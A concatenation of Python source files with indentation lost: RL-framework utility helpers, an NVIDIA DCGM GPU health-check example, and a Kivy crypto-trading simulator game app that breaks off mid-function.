import ast
try:
int_value = int(value)
return int_value if int_value == value else value
except:
pass
try:
return ast.literal_eval(value)
except:
return value
def set_gpu(gpu_id):
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
def set_cpu():
set_gpu("")
# dictionary to class
class DictToClass(object):
def __init__(self, data):
for name, value in data.iteritems():
setattr(self, name, self._wrap(value))
def _wrap(self, value):
if isinstance(value, (tuple, list, set, frozenset)):
return type(value)([self._wrap(v) for v in value])
else:
return DictToClass(value) if isinstance(value, dict) else value
# class to dictionary
def ClassToDict(x):
# return dict((key, getattr(x, key)) for key in dir(x) if key not in dir(x.__class__))
dictionary = x.__dict__
return {key: dictionary[key] for key in dictionary.keys() if not key.startswith('__')}
def cmd_line_run(result, run_cmd, id=-1):
p = Popen(run_cmd, shell=True, executable="/bin/bash")
while result[0] is None or result[0] == [None]:
if id in killed_processes:
p.kill()
result[0] = p.poll()
def threaded_cmd_line_run(run_cmd, id=-1):
runThread = []
result = [[None]]
try:
params = (result, run_cmd, id)
runThread = threading.Thread(name='runThread', target=cmd_line_run, args=params)
runThread.daemon = True
runThread.start()
except:
runThread.join()
return result
class Signal(object):
"""
Stores a stream of values and provides methods like get_mean and get_max
which returns the statistics about accumulated values.
"""
def __init__(self, name):
self.name = name
self.sample_count = 0
self.values = []
def reset(self):
self.sample_count = 0
self.values = []
def add_sample(self, sample):
"""
:param sample: either a single value or an array of values
"""
self.values.append(sample)
def _get_values(self):
if type(self.values[0]) == np.ndarray:
return np.concatenate(self.values)
else:
return self.values
def get_last_value(self):
if len(self.values) == 0:
return np.nan
else:
return self._get_values()[-1]
def get_mean(self):
if len(self.values) == 0:
return ''
return np.mean(self._get_values())
def get_max(self):
if len(self.values) == 0:
return ''
return np.max(self._get_values())
def get_min(self):
if len(self.values) == 0:
return ''
return np.min(self._get_values())
def get_stdev(self):
if len(self.values) == 0:
return ''
return np.std(self._get_values())
def force_list(var):
if isinstance(var, list):
return var
else:
return [var]
def squeeze_list(var):
if len(var) == 1:
return var[0]
else:
return var
def get_open_port():
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class timeout:
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def _handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self._handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
def switch_axes_order(observation, from_type='channels_first', to_type='channels_last'):
"""
transpose an observation axes from channels_first to channels_last or vice versa
:param observation: a numpy array
:param from_type: can be 'channels_first' or 'channels_last'
:param to_type: can be 'channels_first' or 'channels_last'
:return: a new observation with the requested axes order
"""
if from_type == to_type or len(observation.shape) == 1:
return observation
assert 2 <= len(observation.shape) <= 3, 'num axes of an observation must be 2 for a vector or 3 for an image'
assert type(observation) == np.ndarray, 'observation must be a numpy array'
if len(observation.shape) == 3:
if from_type == 'channels_first' and to_type == 'channels_last':
return np.transpose(observation, (1, 2, 0))
elif from_type == 'channels_last' and to_type == 'channels_first':
return np.transpose(observation, (2, 0, 1))
else:
return np.transpose(observation, (1, 0))
def stack_observation(curr_stack, observation, stack_size):
"""
Adds a new observation to an existing stack of observations from previous time-steps.
:param curr_stack: The current observations stack.
:param observation: The new observation
:param stack_size: The required stack size
:return: The updated observation stack
"""
if curr_stack == []:
# starting an episode
curr_stack = np.vstack(np.expand_dims([observation] * stack_size, 0))
curr_stack = switch_axes_order(curr_stack, from_type='channels_first', to_type='channels_last')
else:
curr_stack = np.append(curr_stack, np.expand_dims(np.squeeze(observation), axis=-1), axis=-1)
curr_stack = np.delete(curr_stack, 0, -1)
return curr_stack
def call_method_for_all(instances: List, method: str, args=[], kwargs={}) -> List:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param method: the name of the function to be called
:param args: the positional parameters of the method
:param kwargs: the named parameters of the method
:return: a list of the returns values for all the instances
"""
result = []
if not isinstance(args, list):
args = [args]
sub_methods = method.split('.') # we allow calling an internal method such as "as_level_manager.train"
for instance in instances:
sub_instance = instance
for sub_method in sub_methods:
if not hasattr(sub_instance, sub_method):
raise ValueError("The requested instance method {} does not exist for {}"
.format(sub_method, '.'.join([str(instance.__class__.__name__)] + sub_methods)))
sub_instance = getattr(sub_instance, sub_method)
result.append(sub_instance(*args, **kwargs))
return result
def set_member_values_for_all(instances: List, member: str, val) -> None:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param member: the name of the member to be changed
:param val: the new value to assign
:return: None
"""
for instance in instances:
if not hasattr(instance, member):
raise ValueError("The requested instance member does not exist")
setattr(instance, member, val)
def short_dynamic_import(module_path_and_attribute: str, ignore_module_case: bool=False):
"""
Import by "path:attribute"
:param module_path_and_attribute: a path to a python file (using dots to separate dirs), followed by a ":" and
an attribute name to import from the path
:return: the requested attribute
"""
if '/' in module_path_and_attribute:
"""
Imports a class from a module using the full path of the module. The path should be given as:
<full absolute module path with / including .py>:<class name to import>
And this will be the same as doing "from <full absolute module path> import <class name to import>"
"""
return dynamic_import_from_full_path(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
else:
"""
Imports a class from a module using the relative path of the module. The path should be given as:
<full absolute module path with . and not including .py>:<class name to import>
And this will be the same as doing "from <full relative module path> import <class name to import>"
"""
return dynamic_import(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
def dynamic_import(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split(".")[-1]
available_modules = os.listdir(os.path.dirname(module_path.replace('.', '/')))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split(".")[:-1] + [curr_module_name])
module = importlib.import_module(module_path)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_from_full_path(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split("/")[-1]
available_modules = os.listdir(os.path.dirname(module_path))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split("/")[:-1] + [curr_module_name])
spec = importlib.util.spec_from_file_location("module", module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_and_instantiate_module_from_params(module_parameters, path=None, positional_args=[],
extra_kwargs={}):
"""
A function dedicated for coach modules like memory, exploration policy, etc.
Given the module parameters, it imports it and instantiates it.
:param module_parameters:
:return:
"""
import inspect
if path is None:
path = module_parameters.path
module = short_dynamic_import(path)
args = set(inspect.getfullargspec(module).args).intersection(module_parameters.__dict__)
args = {k: module_parameters.__dict__[k] for k in args}
args = {**args, **extra_kwargs}
return short_dynamic_import(path)(*positional_args, **args)
def last_sample(state):
"""
given a batch of states, return the last sample of the batch with length 1
batch axis.
"""
return {
k: np.expand_dims(v[-1], 0)
for k, v in state.items()
}
def get_all_subclasses(cls):
if len(cls.__subclasses__()) == 0:
return []
ret = []
for drv in cls.__subclasses__():
ret.append(drv)
ret.extend(get_all_subclasses(drv))
return ret
class SharedMemoryScratchPad(object):
def __init__(self):
self.dict = {}
def add(self, key, value):
self.dict[key] = value
def get(self, key, timeout=30):
start_time = time.time()
timeout_passed = False
while key not in self.dict and not timeout_passed:
time.sleep(0.1)
timeout_passed = (time.time() - start_time) > timeout
if timeout_passed:
return None
return self.dict[key]
def internal_call(self, key, func, args: Tuple):
if type(args) != tuple:
args = (args,)
return getattr(self.dict[key], func)(*args)
class Timer(object):
def __init__(self, prefix):
self.prefix = prefix
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(self.prefix, time.time() - self.start)
class ReaderWriterLock(object):
def __init__(self):
self.num_readers_lock = Manager().Lock()
self.writers_lock = Manager().Lock()
self.num_readers = 0
self.now_writing = False
def some_worker_is_reading(self):
return self.num_readers > 0
def some_worker_is_writing(self):
return self.now_writing is True
def lock_writing_and_reading(self):
self.writers_lock.acquire() # first things first - block all other writers
self.now_writing = True # block new readers who haven't started reading yet
while self.some_worker_is_reading(): # let existing readers finish their homework
time.sleep(0.05)
def release_writing_and_reading(self):
self.now_writing = False # release readers - guarantee no readers starvation
self.writers_lock.release() # release writers
def lock_writing(self):
while self.now_writing:
time.sleep(0.05)
self.num_readers_lock.acquire()
self.num_readers += 1
self.num_readers_lock.release()
def release_writing(self):
self.num_readers_lock.acquire()
self.num_readers -= 1
self.num_readers_lock.release()
class ProgressBar(object):
def __init__(self, max_value):
self.start_time = time.time()
self.max_value = max_value
self.current_value = 0
def update(self, current_value, additional_info=""):
self.current_value = current_value
percentage = int((100 * current_value) / self.max_value)
sys.stdout.write("\rProgress: ({}/{}) Time: {} sec {}%|{}{}| {}"
.format(current_value, self.max_value,
round(time.time() - self.start_time, 2),
percentage, '#' * int(percentage / 10),
' ' * (10 - int(percentage / 10)),
additional_info))
sys.stdout.flush()
def close(self):
print("")
def start_shell_command_and_wait(command):
p = Popen(command, shell=True, preexec_fn=os.setsid)
def cleanup():
os.killpg(os.getpgid(p.pid), 15)
atexit.register(cleanup)
p.wait()
atexit.unregister(cleanup)
def indent_string(string):
return '\t' + string.replace('\n', '\n\t')
|
dcgm_health_check.py | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../')
import dcgm_structs
import dcgm_fields
import dcgm_agent
import dcgmvalue
from threading import Thread
from time import sleep
## Look at __name__ == "__main__" for entry point to the script
class RunDCGM():
def __init__(self, ip, opMode):
self.ip = ip
self.opMode = opMode
def __enter__(self):
dcgm_structs._dcgmInit()
self.handle = dcgm_agent.dcgmInit()
return self.handle
def __exit__(self, eType, value, traceback):
dcgm_agent.dcgmShutdown()
## Helper method to convert enum to system name
def helper_convert_system_enum_to_sytem_name(system):
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PCIE):
return "PCIe"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_NVLINK):
return "NvLink"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PMU):
return "PMU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MCU):
return "MCU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MEM):
return "MEM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_SM):
return "SM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_INFOROM):
return "Inforom"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_THERMAL):
return "Thermal"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_POWER):
return "Power"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_DRIVER):
return "Driver"
## helper method to convert helath return to a string for display purpose
def convert_overall_health_to_string(health):
if health == dcgm_structs.DCGM_HEALTH_RESULT_PASS:
return "Pass"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_WARN:
return "Warn"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL:
return "Fail"
else :
return "N/A"
## Worker function
def agent_worker_function(dcgmHandle, groupId):
NUM_ITERATIONS = 5
count = 0
groupId = groupId
## Add the health watches
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL
dcgm_agent.dcgmHealthSet(dcgmHandle, groupId, newSystems)
while True:
dcgm_agent.dcgmUpdateAllFields(dcgmHandle, 1)
try:
## Invoke Health checks
group_health = dcgm_agent.dcgmHealthCheck(dcgmHandle, groupId)
print "Overall Health for the group: %s" % convert_overall_health_to_string(group_health.overallHealth)
for index in range (0, group_health.gpuCount):
print "GPU ID : %d" % group_health.gpu[index].gpuId
for incident in range (0, group_health.gpu[index].incidentCount):
print "system tested : %d" % group_health.gpu[index].systems[incident].system
print "system health : %s" % convert_overall_health_to_string(group_health.gpu[index].systems[incident].health)
print "system health err : %s" % group_health.gpu[index].systems[incident].errorString
print "\n"
except dcgm_structs.DCGMError as e:
errorCode = e.value
print "dcgmEngineHelathCheck returned error: %d" % errorCode
sys.exc_clear()
count = count + 1
if count == NUM_ITERATIONS:
break
sleep(2)
## Main
def main():
## Initilaize the DCGM Engine as manual operation mode. This implies that it's execution is
## controlled by the monitoring agent. The user has to periodically call APIs such as
## dcgmEnginePolicyTrigger and dcgmEngineUpdateAllFields which tells DCGM to wake up and
## perform data collection and operations needed for policy management.
with RunDCGM('127.0.0.1', dcgm_structs.DCGM_OPERATION_MODE_MANUAL) as handle:
## Create a default group. (Default group is comprised of all the GPUs on the node)
## Let's call the group as "all_gpus_group". The method returns an opaque handle (groupId) to
## identify the newly created group.
groupId = dcgm_agent.dcgmGroupCreate(handle, dcgm_structs.DCGM_GROUP_DEFAULT, "all_gpus_group")
## Invoke method to get information on the newly created group
groupInfo = dcgm_agent.dcgmGroupGetInfo(handle, groupId)
## Create reference to DCGM status handler which can be used to get the statuses for multiple
## operations on one or more devices present in the group
status_handle = dcgm_agent.dcgmStatusCreate()
## The worker function can be executed as a separate thread or as part of the main thread.
## Executed as a separate thread here
thread = Thread(target = agent_worker_function, args = (handle, groupId))
thread.start()
##########################################
# Any other useful work can be placed here
##########################################
thread.join()
print "Worker thread completed"
## Destroy the group
try:
dcgm_agent.dcgmGroupDestroy(handle, groupId)
except dcgm_structs.DCGMError as e:
print >>sys.stderr, "Failed to remove the test group, error: %s" % e
sys.exit(1)
## Destroy the status handle
try:
dcgm_agent.dcgmStatusDestroy(status_handle)
except dcgm_structs.DCGMError as e:
print >>sys.stderr, "Failed to remove status handler, error: %s" % e
sys.exit(1)
if __name__ == '__main__':
main()
|
main.py | from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.dropdown import DropDown
from kivy.uix.boxlayout import BoxLayout
from kivy.graphics import Color, Rectangle
from kivy.utils import get_color_from_hex
from kivy.storage.jsonstore import JsonStore
from assets.utils.PriceFetcher import Fetcher
from assets.utils.NewsFetcher import NewsFetcher
from threading import Thread
from time import sleep
import webbrowser
from assets.utils import Pulser
# from kivy.config import Config
# Config.set('graphics', 'width', '412')
# Config.set('graphics', 'height', '915')
class MainApp(App):
"""
_DEF_EX = exchange (for now hard coded to 'Binance')
_DEF_SYM = symbol (for now default is 'btcusdt')
_DARK_MODE_RGB = RGB for dark mode
_LIGHT_MODE_RGB = RGB for light mode
_DEF_MODE = default view mode
_DEFAULT_NEWS_MODE = default status for displaying news
_DEF_CUM_PNL = default cumulative pnl
_DEFAULT_FEES = default user fees
_PNL_PERC = decimal percision for pnl display
_DEF_DATAJSON_NAME = json filename for user settings
current_position - current position being held (1 for long, -1 for short, 0 for none)
entry_price - entry price for current position
last_price
zero_pnl - macro string used to reset PnL
cumulative_pnl - PnL of all positions
current_pnl - PnL of current position being held
position_mapping - convert from int to str representation of position type
display_mode_mapping - convert from integer to str representation of display mode
_GIT_URL - the developer's GITHUB url
about_info - the text to be displayed in the about window
"""
_DARK_MODE_RGB = (0, 0, 0)
_TEXT_COLOR_DARKMODE = get_color_from_hex("#ffffff")
_LIGHT_MODE_RGB = (227 / 255, 214 / 255, 177 / 255)
_TEXT_COLOR_LIGHTMODE = get_color_from_hex("#000000")
_DEF_EX = "Binance"
_DEF_SYM = "BTCUSDT"
_DEF_DISP_MODE = 0
_DEFAULT_NEWS_MODE = True
_DEF_CUM_PNL = 0.0
_DEFAULT_FEES = 0.0
_PNL_PERC = 2
_DEF_DATAJSON_NAME = "user_data"
_GREEN_HEX = "#00b82b"
_RED_HEX = "#b80000"
price_fetcher = Fetcher(_DEF_EX)
current_position = int()
entry_price = float()
last_price = float()
zero_pnl = "0.00%"
current_pnl = 0.0
position_mapping = {
1: 'Long',
0: 'Neutral',
-1: 'Short'
}
display_mode_mapping = {
0: 'Dark Mode',
1: 'Light Mode'
}
_GIT_URL = "https://github.com/adanikel"
about_info = f'This is an open source game designed to ' \
f'simulate real-life trading by fetching a live price feed ' \
f'from top crypto exchanges (currently only Binance is supported).' \
f'\n\n\n' \
f'Made by [ref={_GIT_URL}][color=0000ff]adanikel[/color][/ref]'
def build(self):
"""
main_layout (used as class attr)
symbol_label - see current symbol
price_label - live price feed
pnl_label - live PnL of current position
entry_price_status_layout
pos_str_label - string representation of current position
entry_price_label - entry price of current position
news_label - news flash
options_layout - to add padding to the button
button_refresh - a refresh button for the cumulative PnL
button_settings - a button to open settings menu
popup_settings - a popup window for settings
symbols_list - dropdown list for symbols
button_display_mode - toggle view mode (dark or light)
button_news - turn on / off newsflash
button_fees - popup page to fees
fees_label - display fees
fees_up_button - increment fees
fees_down_button - decrement fees
button_about - display about
cum_pnl_label
position_buttons_layout
button_buy
button_sell
"""
self.store = JsonStore(f'{self._DEF_DATAJSON_NAME}.json')
self.load_user_data()
self.main_layout = BoxLayout(orientation="vertical")
self.main_layout.add_widget(Pulser.bg_pulser)
with self.main_layout.canvas:
Rectangle(source="icons/lightning.png", size=(1450, 1450), pos=(0, 550))
self.symbol_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=100,
pos_hint={'center_x': .5, 'center_y': 1},
color=(237 / 255, 142 / 255, 43 / 255, 0.4))
self.main_layout.add_widget(self.symbol_label) # add price label
self.price_label = Label(text='0.0',
bold=True,
size_hint=(.8, .8),
font_size=250,
pos_hint={'center_x': .5, 'center_y': .9})
self.main_layout.add_widget(self.price_label) # add price label
self.pnl_label = Label(text=self.zero_pnl,
bold=True,
size_hint=(.5, .5),
font_size=100,
pos_hint={'center_x': .5, 'center_y': .9})
self.main_layout.add_widget(self.pnl_label) # add price label
entry_price_status_layout = BoxLayout(orientation='horizontal')
self.pos_str_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=60,
pos_hint={'center_x': .5, 'center_y': .9})
entry_price_status_layout.add_widget(self.pos_str_label) # add price label
self.entry_price_label = Label(text='0.00',
italic=True,
size_hint=(.5, .5),
font_size=60,
pos_hint={'center_x': .5, 'center_y': .9})
entry_price_status_layout.add_widget(self.entry_price_label) # add price label
self.main_layout.add_widget(entry_price_status_layout)
self.news_label = Label(text='',
size_hint=(.5, .5),
font_size=60,
pos=(0, 0))
self.main_layout.add_widget(self.news_label)
options_layout = BoxLayout(orientation="horizontal",
# padding=[200, 100, 100, 100],
pos_hint={'center_x': 0.6, 'center_y': 0.5},
spacing=100)
self.button_settings = Button(text='',
size_hint=(None, None),
size=(170, 170),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_settings.bind(on_press=self.on_press_settings)
options_layout.add_widget(self.button_settings)
self.button_refresh = Button(text='',
size_hint=(None, None),
size=(170, 170),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_refresh.bind(on_press=self.on_press_refresh)
options_layout.add_widget(self.button_refresh)
self.cum_pnl_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=140,
pos_hint={'center_x': .5, 'center_y': .5})
options_layout.add_widget(self.cum_pnl_label)
self.main_layout.add_widget(options_layout)
position_buttons_layout = BoxLayout(orientation="horizontal",
size_hint=(1, 0.5))
button_buy = Button(text='Buy',
bold=True,
size_hint=(.8, .8),
pos_hint={'center_x': .5, 'center_y': .8},
background_color=get_color_from_hex("#3de03a"))
button_buy.bind(on_press=self.on_press_buy)
position_buttons_layout.add_widget(button_buy)
button_sell = Button(text='Sell',
bold=True,
size_hint=(.8, .8),
pos_hint={'center_x': .5, 'center_y': .8},
background_color=get_color_from_hex("#eb3838"))
button_sell.bind(on_press=self.on_press_sell)
position_buttons_layout.add_widget(button_sell)
self.main_layout.add_widget(position_buttons_layout)
self.start_ticker(self.current_symbol)
self.popup_settings = Popup(title='Settings',
size_hint=(0.5, 0.5),
background='icons/secondary_background.png',
background_color=[1, 1, 1, .5],
on_dismiss=self.save_user_data)
self.settings_buttons = BoxLayout(orientation="vertical", padding=[0, 0, 0, 700]) # in pc, use 100
self.symbols_dropdown = DropDown(max_height=650)
for symbol in self.price_fetcher.get_all_symbols():
symbol_button = Button(text=symbol.upper(), size_hint_y=None, height=125)
symbol_button.bind(on_release=lambda symbol_button: self.symbols_dropdown.select(symbol_button.text))
self.symbols_dropdown.add_widget(symbol_button)
self.main_symbol_button = Button(text=self.current_symbol.upper(),
pos_hint={'center_x': .5, 'center_y': .8})
self.main_symbol_button.bind(on_release=self.symbols_dropdown.open)
self.symbols_dropdown.bind(on_select=self.change_ticker)
self.settings_buttons.add_widget(self.main_symbol_button)
self.button_display_mode = Button(text='',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_display_mode.bind(on_press=self.set_display_mode)
self.settings_buttons.add_widget(self.button_display_mode)
self.about_label = Label(text=self.about_info,
markup=True,
on_ref_press=self.on_ref_press,
pos_hint={'center_x': .5, 'center_y': 1})
self.about_label.bind(size=lambda s, w: s.setter('text_size')(s, w)) # to limit text into popup
self.about_window = Popup(title='About',
size_hint=(0.5, 0.5),
background_color=[1, 1, 1, .5],
content=self.about_label)
self.news_fetcher = NewsFetcher()
self.button_news = Button(text=self.generate_news_button_text(),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_news.bind(on_press=self.on_press_news)
self.settings_buttons.add_widget(self.button_news)
if self.news_status:
self.start_news_flasher()
self.fees_layout = BoxLayout(orientation='horizontal',
padding=[10, 0, 10, 0])
self.fees_label = Label(text='',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.1, 0.1))
self.update_fees_label()
self.fees_layout.add_widget(self.fees_label)
self.fees_up = Button(text='+',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.03, 0.1))
self.fees_up.bind(on_press=self.on_press_fees_up)
self.fees_layout.add_widget(self.fees_up)
self.fees_down = Button(text='-',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.03, 0.1))
self.fees_down.bind(on_press=self.on_press_fees_down)
self.fees_layout.add_widget(self.fees_down)
self.fees_window = Popup(title='Fees',
size_hint=(0.5, 0.5),
background_color=[1, 1, 1, .5],
content=self.fees_layout)
self.button_fees = Button(text='Fees',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_fees.bind(on_press=self.on_press_fees)
self.settings_buttons.add_widget(self.button_fees)
self.button_about = Button(text='About',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_about.bind(on_press=self.on_press_about)
self.settings_buttons.add_widget(self.button_about)
self.popup_settings.add_widget(self.settings_buttons)
self.set_display_mode(None, load_up=True)
self.reset_pnl() # for display mode text
self.update_symbol_label() # set up label
return self.main_layout
def load_user_data(self):
"""
loads caches user data from last run
"""
if self.store.exists(self._DEF_DATAJSON_NAME):
try:
data = self.store.get(self._DEF_DATAJSON_NAME)
self._DEF_SYM = data['_SYM']
self._DEF_DISP_MODE = data['_DEF_DISP_MODE']
self._DEFAULT_NEWS_MODE = data['_DEFAULT_NEWS_MODE']
self._DEFAULT_FEES = data['_DEFAULT_FEES']
self._DEF_CUM_PNL = data['cum_pnl']
except KeyError:
pass # no data will be loaded
self.apply_user_data()
def apply_user_data(self):
"""
applies default / loaded settings to current run
"""
self.current_symbol = self._DEF_SYM
self.current_display_mode = self._DEF_DISP_MODE
self.news_status = self._DEFAULT_NEWS_MODE
self.user_fees = self._DEFAULT_FEES
self.cumulative_pnl = self._DEF_CUM_PNL
def save_user_data(self, *args):
"""
save current data
"""
self.store.put(self._DEF_DATAJSON_NAME,
_SYM=self.current_symbol,
_DEF_DISP_MODE=self.current_display_mode,
_DEFAULT_NEWS_MODE=self.news_status,
_DEFAULT_FEES=self.user_fees,
cum_pnl=self.cumulative_pnl)
def start_news_flasher(self):
"""
will be triggered upon button press and at launch
"""
Thread(target=self.news_fetcher.news_manager, args=(self.flash_news, self.news_status), daemon=True).start()
def reset_news_label(self):
"""
set back to empty text after newsflash is over
"""
self.news_label.text = ''
def flash_news(self, text):
"""
display a newsflash
"""
def_y_pos = self.news_label.pos[1]
pos = 5000
counter = 2 * pos
self.news_label.pos = (pos, def_y_pos)
self.news_label.text = text
while counter > 0 and self.news_status:
pos -= 1.5
counter -= 1
self.news_label.pos = (pos, def_y_pos)
sleep(0.01)
self.reset_news_label()
def set_display_mode(self, instance, load_up=False):
"""
sets 0 for dark mode, 1 for light mode
"""
if not load_up:
self.current_display_mode = 0 if self.current_display_mode else 1
self.button_display_mode.text = self.display_mode_mapping[self.current_display_mode]
with self.main_layout.canvas.before:
if self.current_display_mode == 1:
Color(self._LIGHT_MODE_RGB)
self.button_refresh.background_normal = 'icons/light_mode/refresh_icon_light.png'
self.button_refresh.background_down = 'icons/light_mode/refresh_icon_light.png'
self.button_settings.background_normal = 'icons/light_mode/settings_icon_light.png'
self.button_settings.background_down = 'icons/light_mode/settings_icon_light.png'
Rectangle(size=(9999, 9999))
else:
Color(self._DARK_MODE_RGB)
self.button_refresh.background_normal = 'icons/dark_mode/refresh_icon_dark.png'
self.button_refresh.background_down = 'icons/dark_mode/refresh_icon_dark.png'
self.button_settings.background_normal = 'icons/dark_mode/settings_icon_dark.png'
self.button_settings.background_down = 'icons/dark_mode/settings_icon_dark.png'
self.main_layout.canvas.before.clear()
self.entry_price_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
self.news_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
if self.pnl_label.text == self.zero_pnl: # if zero pnl
self.pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
self.update_cum_pnl_label()
self.update_position_label()
def start_ticker(self, symbol: str):
"""
start a new ticker on a new thread
* fetches all tickers and verifies symbol exists
* passes `self.on_price_update` as the callback method
"""
if symbol.upper() in self.price_fetcher.get_all_symbols():
Thread(target=self.price_fetcher.connect_ws, args=(symbol, self.on_price_update), daemon=True).start()
while not self.last_price:
sleep(0.05)
else:
raise Exception(f"ticker {symbol} does not exist")
def stop_ticker(self, symbol: str):
"""
stop ticker (kill stream and thread)
"""
self.price_fetcher.disconnect_ws(symbol)
def change_ticker(self, instance, new_symbol: str):
"""
disconnects old symbol stream and connects a new one
uses first fetch via REST for illiquid pairs
"""
self.stop_ticker(self.current_symbol)
self.reset_pnl()
self.reset_position()
self.current_symbol = new_symbol
self.update_symbol_label()
self.start_ticker(new_symbol)
self.main_symbol_button.text = new_symbol
def on_press_news(self, instance):
"""
enable / disable newsflash
"""
self.news_status = not self.news_status
if not self.news_status:
self.news_fetcher.turn_off()
else:
self.start_news_flasher()
self.button_news.text = self.generate_news_button_text()
def generate_news_button_text(self):
"""
generate label for news toggler based on status
"""
return f'Display news - {self.news_status}'
def update_fees_label(self):
"""
update fees button label
"""
self.user_fees = round(self.user_fees, 2)
self.fees_label.text = f"{self.user_fees}"
def on_press_fees(self, instance):
"""
Open `about` popup window
"""
self.fees_window.open()
def on_press_fees_up(self, instance):
"""
increments fees and updates label
"""
self.user_fees += 0.01
self.update_fees_label()
def on_press_fees_down(self, instance):
"""
decrements fees and updates label
"""
self.user_fees -= 0.01
self.update_fees_label()
def on_press_about(self, instance):
"""
Open `fees` popup window
"""
self.about_window.open()
@staticmethod
def on_ref_press(*args):
"""
open ref link
"""
webbrowser.open(args[1])
def on_press_sell(self, instance):
"""
if no pos - enter short
if long - close pos
"""
if self.current_position == 0:
self.current_position = -1
self.entry_price = self.last_price
elif self.current_position == 1:
self.reset_position()
self.update_status_labels()
def on_press_buy(self, instance):
"""
if no pos - enter long
if short - close pos
"""
if self.current_position == 0:
self.current_position = 1
self.entry_price = self.last_price
elif self.current_position == -1:
self.reset_position()
self.update_status_labels()
def on_press_refresh(self, instance):
"""
when pressing refresh button
"""
self.reset_cum_pnl()
def on_press_settings(self, instance):
"""
when pressing settings button
"""
self.open_settings_menu()
def open_settings_menu(self):
"""
opens the settings popup menu
"""
self.popup_settings.open()
def apply_fees(self):
"""
apply fees to pnl
"""
self.current_pnl -= self.user_fees
def reset_cum_pnl(self):
"""
resets cumulative pnl
"""
self.cumulative_pnl = 0.0
self.update_cum_pnl_label()
def update_status_labels(self):
"""
updates:
* entry price label
* position label
* cumulative pnl label
"""
self.update_entry_label()
self.update_position_label()
self.update_cum_pnl_label()
def reset_position(self):
"""
* updates cumulative pnl (with fees)
* resets position status
* resets entry price
* resets pos pnl
"""
self.cumulative_pnl += (self.current_pnl - self.user_fees)
self.current_position = 0
self.entry_price = 0
self.reset_pnl()
self.update_position_label()
self.update_entry_label()
def reset_pnl(self):
"""Reset pnl label"""
self.pnl_label.text = self.zero_pnl
self.pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else self._TEXT_COLOR_DARKMODE
def on_price_update(self, price):
"""
will be passed as callback to ws stream
"""
self.update_pnl(price)
precision = self.price_fetcher.get_symbol_precision(self.current_symbol)
self.price_label.text = f'{price:.{precision}f}'
if price > self.last_price:
self.price_label.color = get_color_from_hex(self._GREEN_HEX)
else:
self.price_label.color = get_color_from_hex(self._RED_HEX)
self.last_price = price
def update_pnl(self, price):
"""
calculates current position PnL and updates the label accordingly
takes user fees into account
"""
if self.current_position != 0:
self.current_pnl = (self.entry_price / price)
self.current_pnl = (self.current_pnl - 1) * 100 if self.current_position == -1 else \
